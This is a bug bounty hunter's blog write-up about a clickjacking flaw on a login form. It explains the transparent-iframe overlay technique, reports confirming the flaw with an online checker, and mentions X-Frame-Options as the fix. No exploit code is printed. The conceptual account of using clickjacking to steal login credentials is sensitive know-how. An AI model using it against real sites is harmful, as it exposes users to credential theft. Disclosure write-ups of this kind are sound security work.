Hey guys! Hope you all are doing fine. As I was approached by many community members asking to share with them some insights regarding my bounties, so I thought what better way to do it…than doing a write-up.

In today’s topic, I will be sharing my first ever encounter with clickjacking that persisted on a login form. But before that let’s shed some light on what clickjacking is?

Clickjacking is basically a portmanteau of words including “click” and “hijacking”, meaning hijacking someone’s click and using it for malicious purposes.

An attacker embeds the vulnerable site within a transparent iframe inside the attacker’s own website and overlays it with objects such as a button using CSS thus tricking the user into performing unintended actions on the vulnerable site.

Due to the way it’s implemented, the focus of the term “UI redressing” was changed to describe the category of these attacks, rather than just clickjacking itself.

Usually, it is described as a low-tier finding but since in my case it existed on a login form that could potentially be exploited to obtain users' login credentials, it had a much larger impact.

Following my usual routine, I was randomly toying around with www.mytarget.com a vulnerable site, looking for low hanging fruits. After performing a check using

https://clickjacker.io/

It was confirmed that the site was vulnerable to clickjacking and so I started checking all the endpoints to see if it persisted there as well. And BINGO!

Their login form was pregnable as well.

This information itself wasn’t enough to back my findings.

To prove that it had a significant amount of effect, I had to provide a POC showing an Impact that could lead to the user’s credentials being stolen, which was an easy task and it was understandable because of the way clickjacking works.

Among many, one of the ways clickjacking can be mitigated is by using X frame options. Its HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a

<frame>

<iframe>

<object>

For this particular finding, I was awarded a pretty good bounty which I even wasn’t expecting.

So as you can see, even these low lying bugs can pay off a hefty amount. All that matters is on what endpoint it exists and what sort of impact it can have. Hope this will be of any help to you guys, see you next time, till then stay positive and keep testing negative. Happy hunting!